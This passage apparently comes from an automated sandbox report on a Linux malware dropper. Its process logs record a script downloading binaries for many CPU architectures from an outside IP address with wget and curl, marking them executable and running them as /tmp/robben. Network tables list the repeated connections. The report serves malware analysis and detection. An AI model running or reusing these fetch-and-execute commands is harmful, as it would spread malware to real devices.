| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben systemd-private-a081f6d4a0c548d19a522f73bcbdff25-systemd-timedated.service-GOfuOq]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben systemd-private-a081f6d4a0c548d19a522f73bcbdff25-systemd-timedated.service-GOfuOq]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
debian9-mipsel-20240611-en
Max time kernel
231s
Max time network
232s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben systemd-private-26095d1add1b47e9833694eda255f6a0-systemd-timedated.service-6LrYtP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |